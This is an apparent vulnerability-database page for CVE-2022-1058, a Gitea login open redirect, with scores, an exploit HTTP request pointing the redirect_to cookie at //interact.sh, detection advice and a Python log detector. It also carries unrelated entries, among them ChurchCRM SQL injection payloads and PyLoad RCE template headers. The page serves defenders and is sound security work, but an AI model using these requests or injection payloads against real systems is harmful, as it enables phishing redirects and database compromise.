CVE-2022-1058
Published 2022-03-24
CVE-2022-1058: Open Redirect on login in GitHub repository go-gitea/gitea prior to 1.16.5.
Priority P353 · medium · 6.1 CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EXPLOIT
EPSS: 53.18% (98.8th percentile)
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| code.gitea.io | gitea | >= 0 < 1.16.5 | 1.16.5 |
| gitea | gitea | < 1.16.5 | 1.16.5 |
| go-gitea | go-gitea_gitea | >= unspecified < 1.16.5 | 1.16.5 |
Detection & IOCs (extracted from sources)
command:
```http
POST /user/login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: redirect_to=//interact.sh

_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
```
- Exploit sends a POST to /user/login with the `redirect_to` cookie set to a protocol-relative URL (e.g. //attacker.com). A successful exploitation results in an HTTP 302 response whose Location header echoes back the attacker-controlled value.
- Detection: look for HTTP 302 responses to POST /user/login where the Location header contains a protocol-relative URL (starts with //) pointing to an external host.
- Shodan/FOFA fingerprinting for exposed Gitea instances: search for title:"Gitea" or body containing "powered by gitea version".
- The vulnerability exists in Gitea versions prior to 1.16.5 only. Instances running 1.16.5 or later are not affected.
- Doc 3 (CVE-2023-0297 / PyLoad) is unrelated to CVE-2022-1058 and was excluded from this analysis; its inclusion in the source set appears to be erroneous cross-referencing.
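The detection rule described above, applied to proxy logs, as an added example that is not part of the original page or of Gitea. It assumes a reverse proxy that logs the response Location header as one JSON record per line; the field names, the host `git.example.test` and the sample records are constructed for illustration.

```python
import json
from urllib.parse import urlsplit

# Constructed sample records (assumed log schema, documentation-range addresses).
SAMPLE_LOG = """
{"ts":"2022-03-20T10:00:01Z","client":"192.0.2.10","method":"POST","path":"/user/login","status":302,"location":"/"}
{"ts":"2022-03-20T10:00:07Z","client":"192.0.2.11","method":"POST","path":"/user/login","status":302,"location":"//interact.sh"}
{"ts":"2022-03-20T10:01:30Z","client":"192.0.2.12","method":"POST","path":"/user/login","status":200,"location":""}
{"ts":"2022-03-20T10:02:12Z","client":"192.0.2.13","method":"POST","path":"/user/login","status":302,"location":"https://git.example.test/org/repo"}
{"ts":"2022-03-20T10:03:44Z","client":"192.0.2.14","method":"GET","path":"/user/login","status":200,"location":""}
{"ts":"2022-03-20T10:04:05Z","client":"192.0.2.15","method":"POST","path":"/user/login?x=1","status":302,"location":"//attacker.com/path"}
"""

def external_redirect_host(location, own_host):
    """Return the host a Location value leaves the site for, or None if it stays on own_host."""
    host = urlsplit((location or "").strip()).hostname
    # "//host/..." parses with a hostname even though it has no scheme;
    # a plain path such as "/" or "/org/repo" has none and stays on site.
    if host is None or host == own_host.lower():
        return None
    return host

def find_open_redirects(log_text, own_host):
    """Flag 302 responses to POST /user/login whose Location points off-site."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip lines that are not valid records
        if rec.get("method") != "POST" or int(rec.get("status", 0)) != 302:
            continue
        if urlsplit(rec.get("path", "")).path != "/user/login":
            continue
        host = external_redirect_host(rec.get("location"), own_host)
        if host:
            hits.append((rec.get("ts"), rec.get("client"), host))
    return hits

if __name__ == "__main__":
    for ts, client, host in find_open_redirects(SAMPLE_LOG, "git.example.test"):
        print(f"{ts} client={client} login redirect leaves site -> {host}")
```

A hit identifies a login that was redirected off-site; on a patched instance (1.16.5 or later) the same rule should produce no hits.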
CVSS provenance
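| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| nvd | v3.0 | 7.2 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N |
| nvd | v2.0 | 5.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:N |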
OSV
Gitea Open Redirect in code.gitea.io/gitea
osv·2024-06-04
CVE-2022-1058 Gitea Open Redirect in code.gitea.io/gitea
GHSA
Gitea Open Redirect
ghsa·2022-03-25
CVE-2022-1058 [MEDIUM] CWE-601 Gitea Open Redirect
Open Redirect on login in GitHub repository go-gitea/gitea prior to 1.16.5.
OSV
Gitea Open Redirect
osv·2022-03-25
CVE-2022-1058 [MEDIUM] Gitea Open Redirect
Open Redirect on login in GitHub repository go-gitea/gitea prior to 1.16.5.
No detection rules found.
Exploit-DB
ChurchCRM 4.4.5 - SQLi
exploitdb·2022-06-14·CVSS 7.2
CVE-2022-31325 [HIGH] ChurchCRM 4.4.5 - SQLi
---
# Exploit Title: ChurchCRM 4.4.5 - SQLi
# Exploit Author: nu11secur1ty
# Date: 05.11.2022
# Vendor: https://churchcrm.io/
# Software: https://github.com/ChurchCRM/CRM
# Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325
## Description:
There is a SQL Injection vulnerability in ChurchCRM 4.4.5 via the 'PersonID' field in /churchcrm/WhyCameEditor.php.
[+] Payloads:
```mysql
---
Parameter: PersonID (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: PersonID=(SELECT (CASE WHEN (6445=6445) THEN 1 ELSE
(SELECT 2844 UNION SELECT 1058) END))&WhyCameID=1&linkBack=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: PersonID=1 AND (SELECT 7116 F
```
Nuclei
Gitea <1.16.5 - Open Redirect
nuclei·CVSS 6.1
CVE-2022-1058 [MEDIUM] Gitea <1.16.5 - Open Redirect
Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
Template:
```yaml
id: CVE-2022-1058
info:
  name: Gitea <1.16.5 - Open Redirect
  author: theamanrawat
  severity: medium
  description: |
    Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
```
Nuclei
PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
nuclei·CVSS 6.1
CVE-2023-0297 [MEDIUM] PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.
Template:
```yaml
id: CVE-2023-0297
info:
  name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
  author: MrHarshvardhan,DhiyaneshDk
  severity: critical
  description: |
    Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the target system.
  remediation: |
    Upgrade PyLoad to a version that is not affected by this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/51532
    - https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1058
    - http://packetstormsecurity.com/files/171096/pyL
```
No writeups or analysis indexed.
Published: 2022-03-24